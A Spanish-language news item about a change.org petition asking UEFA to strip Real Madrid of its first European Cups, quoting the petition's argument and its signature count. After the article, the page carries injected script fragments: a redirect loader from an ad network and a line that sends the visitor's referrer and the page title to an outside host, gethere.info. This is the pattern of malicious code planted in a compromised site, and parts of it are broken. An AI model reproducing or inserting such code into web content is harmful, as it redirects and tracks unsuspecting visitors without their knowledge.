Piden a la UEFA que le retire sus primeras 6 Copas de Europa al Real Madrid

Se trata de una iniciativa que arrancó un grupo de seguidores (se hacen llamar Justicia Deportiva) en el portal change.org, en la que solicitan, en nombre de los “valores que representan el deporte y la democracia”, le retiren las 5 primeras Copas de Europa del Real Madrid, así como el reconocimiento de que el trofeo que ganaron en 1966 no corresponde a una Copa de Europa.

Este es su argumento: “Queremos solicitar, en nombre de los valores que representan el deporte y la democracia, la retirada inmediata de las cinco copas de Europa” otorgadas al Real de Madrid Club de Futbol entre las temporadas 1955-56 y 1959-60, así como el reconocimiento institucional en cuanto a que el trofeo obtenido en la temporada 1965-66,no se corresponde, en ningún caso, con lo que hoy conocemos con el nombre de UEFA Champions League”.

Aunque no lo crean, la petición ronda las 40 mil firmas y está cerca de cumplir la meta trazada (50,000 firmas). Este ejercicio no tiene algún peso oficial, es una petición (dirigida a la UEFA) que refleja la inconformidad de miles de aficionados por los títulos que consiguió el Real Madrid hace varias décadas.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||